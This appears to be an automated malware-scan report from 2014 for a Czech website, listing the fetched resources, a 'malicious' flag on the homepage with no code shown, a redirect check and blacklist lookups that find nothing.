Scanned pages/files
Request | Server response | Status |
http://www.3dmodelyfalco.wz.cz/ | 200 OK Content-Length: 26121 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://www.3dmodelyfalco.wz.cz/file:///C:/Program%20Files/Microsoft%20Office/OFFICE11/fpclass/animate.js | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Dec 2014 12:18:07 GMT Location: http://e.wz.cz/404.html Server: Apache Content-Length: 280 Content-Type: text/html; charset=iso-8859-1 | clean |
http://e.wz.cz/404.html | 200 OK Content-Length: 12877 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://www.3dmodelyfalco.wz.cz/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Dec 2014 12:18:08 GMT Location: http://e.wz.cz/404.html Server: Apache Content-Length: 280 Content-Type: text/html; charset=iso-8859-1 | clean |
http://e.wz.cz/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 3dmodelyfalco.wz.cz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 3dmodelyfalco.wz.cz
Referer: http://www.google.com/search?q=3dmodelyfalco.wz.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=3dmodelyfalco.wz.cz
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://3dmodelyfalco.wz.cz/
Result: 3dmodelyfalco.wz.cz is not infected or malware details are not published yet.